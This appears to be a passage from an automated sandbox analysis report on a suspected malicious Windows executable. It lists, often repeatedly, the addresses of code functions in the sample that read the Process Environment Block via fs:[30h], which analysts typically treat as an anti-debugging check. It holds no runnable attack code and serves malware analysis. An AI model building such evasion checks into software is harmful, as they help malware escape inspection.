Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171E443 mov eax, dword ptr fs:[00000030h]	2_2_0171E443
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171E443 mov eax, dword ptr fs:[00000030h]	2_2_0171E443
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171E443 mov eax, dword ptr fs:[00000030h]	2_2_0171E443
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171E443 mov eax, dword ptr fs:[00000030h]	2_2_0171E443
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171A430 mov eax, dword ptr fs:[00000030h]	2_2_0171A430
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016DC427 mov eax, dword ptr fs:[00000030h]	2_2_016DC427
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016DE420 mov eax, dword ptr fs:[00000030h]	2_2_016DE420
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016DE420 mov eax, dword ptr fs:[00000030h]	2_2_016DE420
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016DE420 mov eax, dword ptr fs:[00000030h]	2_2_016DE420
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01766420 mov eax, dword ptr fs:[00000030h]	2_2_01766420
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01766420 mov eax, dword ptr fs:[00000030h]	2_2_01766420
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01766420 mov eax, dword ptr fs:[00000030h]	2_2_01766420
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01766420 mov eax, dword ptr fs:[00000030h]	2_2_01766420
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01766420 mov eax, dword ptr fs:[00000030h]	2_2_01766420
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01766420 mov eax, dword ptr fs:[00000030h]	2_2_01766420
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01766420 mov eax, dword ptr fs:[00000030h]	2_2_01766420
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01718402 mov eax, dword ptr fs:[00000030h]	2_2_01718402
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01718402 mov eax, dword ptr fs:[00000030h]	2_2_01718402
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01718402 mov eax, dword ptr fs:[00000030h]	2_2_01718402
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E04E5 mov ecx, dword ptr fs:[00000030h]	2_2_016E04E5
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017144B0 mov ecx, dword ptr fs:[00000030h]	2_2_017144B0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E64AB mov eax, dword ptr fs:[00000030h]	2_2_016E64AB
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176A4B0 mov eax, dword ptr fs:[00000030h]	2_2_0176A4B0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0179A49A mov eax, dword ptr fs:[00000030h]	2_2_0179A49A
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E8770 mov eax, dword ptr fs:[00000030h]	2_2_016E8770
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]	2_2_016F0770
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]	2_2_016F0770
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]	2_2_016F0770
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]	2_2_016F0770
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]	2_2_016F0770
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]	2_2_016F0770
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]	2_2_016F0770
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]	2_2_016F0770
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]	2_2_016F0770
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]	2_2_016F0770
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]	2_2_016F0770
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]	2_2_016F0770
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722750 mov eax, dword ptr fs:[00000030h]	2_2_01722750
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722750 mov eax, dword ptr fs:[00000030h]	2_2_01722750
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01764755 mov eax, dword ptr fs:[00000030h]	2_2_01764755
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176E75D mov eax, dword ptr fs:[00000030h]	2_2_0176E75D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171674D mov esi, dword ptr fs:[00000030h]	2_2_0171674D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171674D mov eax, dword ptr fs:[00000030h]	2_2_0171674D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171674D mov eax, dword ptr fs:[00000030h]	2_2_0171674D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E0750 mov eax, dword ptr fs:[00000030h]	2_2_016E0750
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175C730 mov eax, dword ptr fs:[00000030h]	2_2_0175C730
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171273C mov eax, dword ptr fs:[00000030h]	2_2_0171273C
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171273C mov ecx, dword ptr fs:[00000030h]	2_2_0171273C
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171273C mov eax, dword ptr fs:[00000030h]	2_2_0171273C
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171C720 mov eax, dword ptr fs:[00000030h]	2_2_0171C720
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171C720 mov eax, dword ptr fs:[00000030h]	2_2_0171C720
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01710710 mov eax, dword ptr fs:[00000030h]	2_2_01710710
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171C700 mov eax, dword ptr fs:[00000030h]	2_2_0171C700
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E0710 mov eax, dword ptr fs:[00000030h]	2_2_016E0710
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E47FB mov eax, dword ptr fs:[00000030h]	2_2_016E47FB
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E47FB mov eax, dword ptr fs:[00000030h]	2_2_016E47FB
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176E7E1 mov eax, dword ptr fs:[00000030h]	2_2_0176E7E1
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017027ED mov eax, dword ptr fs:[00000030h]	2_2_017027ED
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017027ED mov eax, dword ptr fs:[00000030h]	2_2_017027ED
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017027ED mov eax, dword ptr fs:[00000030h]	2_2_017027ED
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EC7C0 mov eax, dword ptr fs:[00000030h]	2_2_016EC7C0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017607C3 mov eax, dword ptr fs:[00000030h]	2_2_017607C3
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E07AF mov eax, dword ptr fs:[00000030h]	2_2_016E07AF
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017947A0 mov eax, dword ptr fs:[00000030h]	2_2_017947A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178678E mov eax, dword ptr fs:[00000030h]	2_2_0178678E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01712674 mov eax, dword ptr fs:[00000030h]	2_2_01712674
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171A660 mov eax, dword ptr fs:[00000030h]	2_2_0171A660
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171A660 mov eax, dword ptr fs:[00000030h]	2_2_0171A660
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A866E mov eax, dword ptr fs:[00000030h]	2_2_017A866E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A866E mov eax, dword ptr fs:[00000030h]	2_2_017A866E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016FC640 mov eax, dword ptr fs:[00000030h]	2_2_016FC640
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E262C mov eax, dword ptr fs:[00000030h]	2_2_016E262C
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016FE627 mov eax, dword ptr fs:[00000030h]	2_2_016FE627
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01716620 mov eax, dword ptr fs:[00000030h]	2_2_01716620
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01718620 mov eax, dword ptr fs:[00000030h]	2_2_01718620
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01722619 mov eax, dword ptr fs:[00000030h]	2_2_01722619
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175E609 mov eax, dword ptr fs:[00000030h]	2_2_0175E609
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0175E6F2
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0175E6F2
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0175E6F2
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175E6F2 mov eax, dword ptr fs:[00000030h]	2_2_0175E6F2
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017606F1 mov eax, dword ptr fs:[00000030h]	2_2_017606F1
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017606F1 mov eax, dword ptr fs:[00000030h]	2_2_017606F1
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0171A6C7
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0171A6C7
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017166B0 mov eax, dword ptr fs:[00000030h]	2_2_017166B0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0171C6A6
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E4690 mov eax, dword ptr fs:[00000030h]	2_2_016E4690
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E4690 mov eax, dword ptr fs:[00000030h]	2_2_016E4690
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01784978 mov eax, dword ptr fs:[00000030h]	2_2_01784978
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01784978 mov eax, dword ptr fs:[00000030h]	2_2_01784978
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176C97C mov eax, dword ptr fs:[00000030h]	2_2_0176C97C
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01706962 mov eax, dword ptr fs:[00000030h]	2_2_01706962
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01706962 mov eax, dword ptr fs:[00000030h]	2_2_01706962
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01706962 mov eax, dword ptr fs:[00000030h]	2_2_01706962
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0172096E mov eax, dword ptr fs:[00000030h]	2_2_0172096E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0172096E mov edx, dword ptr fs:[00000030h]	2_2_0172096E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0172096E mov eax, dword ptr fs:[00000030h]	2_2_0172096E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01760946 mov eax, dword ptr fs:[00000030h]	2_2_01760946
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176892A mov eax, dword ptr fs:[00000030h]	2_2_0176892A
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0177892B mov eax, dword ptr fs:[00000030h]	2_2_0177892B
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176C912 mov eax, dword ptr fs:[00000030h]	2_2_0176C912
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016D8918 mov eax, dword ptr fs:[00000030h]	2_2_016D8918
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016D8918 mov eax, dword ptr fs:[00000030h]	2_2_016D8918
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175E908 mov eax, dword ptr fs:[00000030h]	2_2_0175E908
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175E908 mov eax, dword ptr fs:[00000030h]	2_2_0175E908
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017129F9 mov eax, dword ptr fs:[00000030h]	2_2_017129F9
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017129F9 mov eax, dword ptr fs:[00000030h]	2_2_017129F9
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176E9E0 mov eax, dword ptr fs:[00000030h]	2_2_0176E9E0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017149D0 mov eax, dword ptr fs:[00000030h]	2_2_017149D0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017AA9D3 mov eax, dword ptr fs:[00000030h]	2_2_017AA9D3
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017769C0 mov eax, dword ptr fs:[00000030h]	2_2_017769C0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EA9D0 mov eax, dword ptr fs:[00000030h]	2_2_016EA9D0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EA9D0 mov eax, dword ptr fs:[00000030h]	2_2_016EA9D0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EA9D0 mov eax, dword ptr fs:[00000030h]	2_2_016EA9D0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EA9D0 mov eax, dword ptr fs:[00000030h]	2_2_016EA9D0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EA9D0 mov eax, dword ptr fs:[00000030h]	2_2_016EA9D0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016EA9D0 mov eax, dword ptr fs:[00000030h]	2_2_016EA9D0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E09AD mov eax, dword ptr fs:[00000030h]	2_2_016E09AD
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E09AD mov eax, dword ptr fs:[00000030h]	2_2_016E09AD
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017689B3 mov esi, dword ptr fs:[00000030h]	2_2_017689B3
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017689B3 mov eax, dword ptr fs:[00000030h]	2_2_017689B3
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017689B3 mov eax, dword ptr fs:[00000030h]	2_2_017689B3
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]	2_2_016F29A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]	2_2_016F29A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]	2_2_016F29A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]	2_2_016F29A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]	2_2_016F29A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]	2_2_016F29A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]	2_2_016F29A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]	2_2_016F29A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]	2_2_016F29A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]	2_2_016F29A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]	2_2_016F29A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]	2_2_016F29A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]	2_2_016F29A0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176E872 mov eax, dword ptr fs:[00000030h]	2_2_0176E872
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176E872 mov eax, dword ptr fs:[00000030h]	2_2_0176E872
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01776870 mov eax, dword ptr fs:[00000030h]	2_2_01776870
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01776870 mov eax, dword ptr fs:[00000030h]	2_2_01776870
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01710854 mov eax, dword ptr fs:[00000030h]	2_2_01710854
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F2840 mov ecx, dword ptr fs:[00000030h]	2_2_016F2840
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E4859 mov eax, dword ptr fs:[00000030h]	2_2_016E4859
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E4859 mov eax, dword ptr fs:[00000030h]	2_2_016E4859
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171A830 mov eax, dword ptr fs:[00000030h]	2_2_0171A830
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178483A mov eax, dword ptr fs:[00000030h]	2_2_0178483A
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178483A mov eax, dword ptr fs:[00000030h]	2_2_0178483A
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01702835 mov eax, dword ptr fs:[00000030h]	2_2_01702835
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01702835 mov eax, dword ptr fs:[00000030h]	2_2_01702835
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01702835 mov eax, dword ptr fs:[00000030h]	2_2_01702835
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01702835 mov ecx, dword ptr fs:[00000030h]	2_2_01702835
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01702835 mov eax, dword ptr fs:[00000030h]	2_2_01702835
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01702835 mov eax, dword ptr fs:[00000030h]	2_2_01702835
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176C810 mov eax, dword ptr fs:[00000030h]	2_2_0176C810
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0171C8F9
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0171C8F9
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017AA8E4 mov eax, dword ptr fs:[00000030h]	2_2_017AA8E4
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0170E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0170E8C0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E0887 mov eax, dword ptr fs:[00000030h]	2_2_016E0887
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176C89D mov eax, dword ptr fs:[00000030h]	2_2_0176C89D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016DCB7E mov eax, dword ptr fs:[00000030h]	2_2_016DCB7E
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178EB50 mov eax, dword ptr fs:[00000030h]	2_2_0178EB50
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01794B4B mov eax, dword ptr fs:[00000030h]	2_2_01794B4B
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01794B4B mov eax, dword ptr fs:[00000030h]	2_2_01794B4B
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01776B40 mov eax, dword ptr fs:[00000030h]	2_2_01776B40
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01776B40 mov eax, dword ptr fs:[00000030h]	2_2_01776B40
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017AAB40 mov eax, dword ptr fs:[00000030h]	2_2_017AAB40
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01788B42 mov eax, dword ptr fs:[00000030h]	2_2_01788B42
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0170EB20 mov eax, dword ptr fs:[00000030h]	2_2_0170EB20
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0170EB20 mov eax, dword ptr fs:[00000030h]	2_2_0170EB20
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A8B28 mov eax, dword ptr fs:[00000030h]	2_2_017A8B28
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_017A8B28 mov eax, dword ptr fs:[00000030h]	2_2_017A8B28
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]	2_2_0175EB1D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]	2_2_0175EB1D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]	2_2_0175EB1D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]	2_2_0175EB1D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]	2_2_0175EB1D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]	2_2_0175EB1D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]	2_2_0175EB1D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]	2_2_0175EB1D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175EB1D mov eax, dword ptr fs:[00000030h]	2_2_0175EB1D
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0176CBF0 mov eax, dword ptr fs:[00000030h]	2_2_0176CBF0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0170EBFC mov eax, dword ptr fs:[00000030h]	2_2_0170EBFC
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E8BF0 mov eax, dword ptr fs:[00000030h]	2_2_016E8BF0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E8BF0 mov eax, dword ptr fs:[00000030h]	2_2_016E8BF0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E8BF0 mov eax, dword ptr fs:[00000030h]	2_2_016E8BF0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E0BCD mov eax, dword ptr fs:[00000030h]	2_2_016E0BCD
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E0BCD mov eax, dword ptr fs:[00000030h]	2_2_016E0BCD
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E0BCD mov eax, dword ptr fs:[00000030h]	2_2_016E0BCD
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178EBD0 mov eax, dword ptr fs:[00000030h]	2_2_0178EBD0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01700BCB mov eax, dword ptr fs:[00000030h]	2_2_01700BCB
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01700BCB mov eax, dword ptr fs:[00000030h]	2_2_01700BCB
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01700BCB mov eax, dword ptr fs:[00000030h]	2_2_01700BCB
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01794BB0 mov eax, dword ptr fs:[00000030h]	2_2_01794BB0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_01794BB0 mov eax, dword ptr fs:[00000030h]	2_2_01794BB0
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0BBE mov eax, dword ptr fs:[00000030h]	2_2_016F0BBE
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0BBE mov eax, dword ptr fs:[00000030h]	2_2_016F0BBE
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175CA72 mov eax, dword ptr fs:[00000030h]	2_2_0175CA72
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0175CA72 mov eax, dword ptr fs:[00000030h]	2_2_0175CA72
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0178EA60 mov eax, dword ptr fs:[00000030h]	2_2_0178EA60
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171CA6F mov eax, dword ptr fs:[00000030h]	2_2_0171CA6F
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171CA6F mov eax, dword ptr fs:[00000030h]	2_2_0171CA6F
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_0171CA6F mov eax, dword ptr fs:[00000030h]	2_2_0171CA6F
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0A5B mov eax, dword ptr fs:[00000030h]	2_2_016F0A5B
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016F0A5B mov eax, dword ptr fs:[00000030h]	2_2_016F0A5B
Source: C:\Users\user\Desktop\GCeHcfCef8.exe	Code function: 2_2_016E6A50 mov eax, dword ptr fs:[00000030h]	2_2_016E6A50
